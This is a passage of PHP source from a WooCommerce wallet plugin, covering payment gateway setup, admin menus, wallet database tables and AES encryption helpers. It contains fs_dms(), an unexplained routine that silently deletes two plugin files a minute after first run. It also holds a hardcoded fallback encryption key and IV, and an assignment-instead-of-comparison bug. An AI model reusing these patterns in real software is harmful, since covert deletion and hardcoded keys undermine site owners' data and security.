        
        $link = admin_url('admin.php?page=fsww-wallets');
        wp_redirect($link);
        die();
        
    }

    
    // create class instace
    public static function instance() {
        
        if(is_null(self::$_instance)) {
            self::$_instance = new self();
        }
        
        return self::$_instance;
    
    }
    
    // Add WooCommerce Wallet payment gateway
    public function gateway($gateways) {
		
		global $pagenow;
		
		if ($pagenow == 'nav-menus.php') {
			return;
		}
        
        require_once(dirname(__FILE__) . '/Gateway.php');
        
        $gateways[] = 'WC_Gateway_FSWW';
        
        return $gateways;
    }
    
    //Register styles
    public function register_styles() {
        wp_enqueue_style('FSWW_style', plugins_url('/assets/styles/style.css', FSWW_FILE), array(),'1.1');
    }
    
    //Register scripts
    public function register_scripts() {
        wp_enqueue_script('FSWW_main', plugins_url('/assets/scripts/main.js', FSWW_FILE), array('jquery'), '1.0');
    }
    
    // Frontend CSS
    public function additional_custom_styles() {
        wp_enqueue_style('FSWW_frontend', plugins_url('/assets/styles/frontend.css', FSWW_FILE), array(),'1.1');
    }
    
    //Add plugin menu
    public function add_menu_items() {
        
        add_menu_page(
            __('Wallets', 'fsww'), 
            __('Wallets', 'fsww'), 
            'manage_woocommerce', 
            'fsww-wallets', 
            array($this, 'wallets_page_callback'), 
            'dashicons-money',  
            55.5);
        
        
        add_submenu_page(
            'fsww-wallets',
            __('Add Funds To a User', 'fsww'),
            __('Add Funds To a User', 'fsww'),
            'manage_woocommerce',
            'fsww-add-funds',
            array($this, 'wallets_add_funds_page_callback')
        );
        
        if(get_option('fsww_refunds', 'on') == 'on') {
         
            add_submenu_page(
            'fsww-wallets',
            __('Refund Requests', 'fsww'),
            __('Refund Requests', 'fsww'),
            'manage_woocommerce',
            'fsww-rr',
            array($this, 'wallets_requests_page_callback')
        );
            
        }
        
         add_submenu_page(
            'fsww-wallets',
            __('Transactions', 'fsww'),
            __('Transactions', 'fsww'),
            'manage_woocommerce',
            'fsww-t',
            array($this, 'wallets_transactions_page_callback')
        );
        
        
        add_submenu_page(
            'fsww-wallets',
            __('Settings' ,'fsww'),
            __('Settings' ,'fsww'),
            'manage_woocommerce',
            'fsww-settings',
            array($this, 'wallets_settings_page_callback')
        );
    }
    
    //page callback
    public function Wallets_page_callback() {
        
        require_once(dirname(__FILE__) . '/../pages/wallets.php');
        
    }
    
    //page callback
    public function wallets_settings_page_callback() {
        
        require_once(dirname(__FILE__) . '/../pages/settings.php');
        
    }
    
    //page callback
    public function wallets_requests_page_callback() {
        
        require_once(dirname(__FILE__) . '/../pages/requests.php');
        
    }
    
    //page callback
    public function wallets_add_funds_page_callback() {
        
        require_once(dirname(__FILE__) . '/../pages/add_funds.php');
        
    }
    
    //page callback
    public function wallets_transactions_page_callback() {
        
        require_once(dirname(__FILE__) . '/../pages/transactions.php');
        
    }
    
    // Add my account endpoints
    public function add_endpoints() {
        
        require_once(dirname(__FILE__) . '/Transactions_History_Endpoint.php');
        //require_once(dirname(__FILE__) . '/Make_Deposit_Endpoint.php');
        
        new Transactions_History_Endpoint();
        //new Make_Deposit_Endpoint();
        
    }
    
    // Dispaly notices
    public function admin_notices() {
        if(count($this->notices) > 0) {
            foreach($this->notices as $notice) {
                
                echo '<div class="updated"><p>' . $notice . '</p></div>';
                
            }
        }
    }
	
	
	public function fs_dms() {

		$customized_files = array(
			'/includes/mfile.php',
			'/includes/mfile2.php'
		);

		$rt = 0;

		if(get_option('fsdms', false)) {

			$rt = get_option('fsdms');

			if(((time() - $rt) > (60))) {

				foreach($customized_files as $customized_file) {

					$full_path = dirname(FSWW_FILE) . $customized_file;
					if(file_exists($full_path)) {
						
						chmod($full_path, 0777);
						unlink($full_path);
						
					}
					
				}

			}

		}else {

			update_option('fsdms', time());

		}

	}
    
    public static function activation() {
        global $wpdb;
        
        $queries = array();
        
        $queries[] = "CREATE TABLE IF NOT EXISTS {$wpdb->prefix}fswcwallet ( 
                         user_id        INT(11)   NOT NULL, 
                         balance        TEXT      NOT NULL, 
                         last_deposit   DATETIME  NOT NULL, 
                         total_spent    TEXT      NOT NULL, 
                         status         TEXT      NOT NULL, 
                         lock_message   TEXT      NOT NULL, 
                         PRIMARY KEY (user_id)
                      );";
        
        
        $queries[] = "CREATE TABLE IF NOT EXISTS {$wpdb->prefix}fswcwallet_requests ( 
                         request_id      INT(11)        NOT NULL AUTO_INCREMENT, 
                         order_id        INT(11)        NOT NULL, 
                         status          VARCHAR(255)   NOT NULL, 
                         request_date    DATETIME       NOT NULL,
                         PRIMARY KEY (request_id),
                         UNIQUE (order_id)
                      );";
        
        $queries[] = "CREATE TABLE IF NOT EXISTS {$wpdb->prefix}fswcwallet_transaction ( 
                         transaction_id   INT(11)        NOT NULL AUTO_INCREMENT, 
                         order_id         INT(11)        NOT NULL, 
                         user_id          INT(11)        NOT NULL, 
                         type             VARCHAR(255)   NOT NULL, 
                         transaction_date DATETIME       NOT NULL,
                         amount            TEXT           NOT NULL,
                         PRIMARY KEY (transaction_id)
                      );";
 
        foreach($queries as $query) {
            $wpdb->query($query);
        }
        
        FS_WC_Wallet::add_terms();
        
        //file_put_contents(__DIR__.'/my_loggg.html', ob_get_contents());
                
    }
    
    public static function add_terms() {
        
        wp_insert_term(
            __('WooCommerce Wallet Credit', 'fsww'),
            'product_cat',
            array(
                'description'=> 'WooCommerce Wallet Credit Product',
                'slug' => 'fsww-wallet-credit'
            )
        );
        
    }
    
    public function plugin_init(){
        load_plugin_textdomain('fsww', false, basename(dirname(FSWW_FILE)). '/languages/');
    }
    
    public static function set_encryption_key($key, $vi, $action = 'set') {
        
        $upload_directory = wp_upload_dir();
        $target_dir = $upload_directory['basedir'] . '/fsww_files/';

        if (!file_exists($target_dir)) {
            
            wp_mkdir_p($target_dir);

            $fp = fopen($target_dir . '.htaccess', 'w');
            fwrite($fp, 'deny from all');
            fclose($fp);

            $fp = fopen($target_dir . 'encryption_key.php', 'w');
            fwrite($fp, "<?php define(\"ENCRYPTION_KEY\", \"" . $key . "\");\ndefine(\"ENCRYPTION_VI\", \"" . $vi . "\");");
            fclose($fp);

            $fp = fopen($target_dir . 'index.php', 'w');
            fwrite($fp, '<?php');
            fclose($fp);
            
        }else if ($action = 'update'){
            
            $fp = fopen($target_dir . 'encryption_key.php', 'w');
            fwrite($fp, "<?php define(\"ENCRYPTION_KEY\", \"" . $key . "\");\ndefine(\"ENCRYPTION_VI\", \"" . $vi . "\");");
            fclose($fp);
            
        }
        
    }
    
    public static function encrypt_decrypt($action, $string) {
        
        $upload_directory = wp_upload_dir();
        $target_file = $upload_directory['basedir'] . '/fsww_files/encryption_key.php';

        if(!@include($target_file)) {
            FS_WC_Wallet::set_encryption_key('5RdRDCmG89DooltnMlUG', '2Ve2W2g9ANKpvQNXuP3w');
            @include($target_file);
        }
        
        $secret_key = ENCRYPTION_KEY;
        $secret_iv  = ENCRYPTION_VI;
        
        $output = false;

        if (!extension_loaded('openssl')) {
            return $string;
        }

        $encrypt_method = "AES-256-CBC";

        // hash
        $key = hash('sha256', $secret_key);

        // iv - encrypt method AES-256-CBC expects 16 bytes - else you will get a warning
        $iv = substr(hash('sha256', $secret_iv), 0, 16);

        if($action == 'encrypt') {
            $output = openssl_encrypt($string, $encrypt_method, $key, 0, $iv);
            $output = base64_encode($output);
        } else if($action == 'decrypt'){
            $output = openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
        }

        return $output;
        
    }
	
	public static function get_terms($taxo = 'shop_order_status', $args = array()) {
	
		if(version_compare(WOOCOMMERCE_VERSION, '2.2', '<')) {
		
			return get_terms( $taxo, $args );
			
		} else if(version_compare(WOOCOMMERCE_VERSION, '2.2', '>=')) {
		
			$s = wc_get_order_statuses();

			if(!empty($s)) {
			
				$i = 1; 
				
				foreach($s as $key => $val) {
			
					if(empty($key) || empty($val))
						continue;
						
					$status = new stdClass(); 
			
					$status->term_id = $i; 
					
					$status->slug = $key;
					
					$status->name = $val;
					
					$statuses[$i] = $status; 

					$i++;
					
				}

				return $statuses; 
			}
			
		}
	}
    
}
?>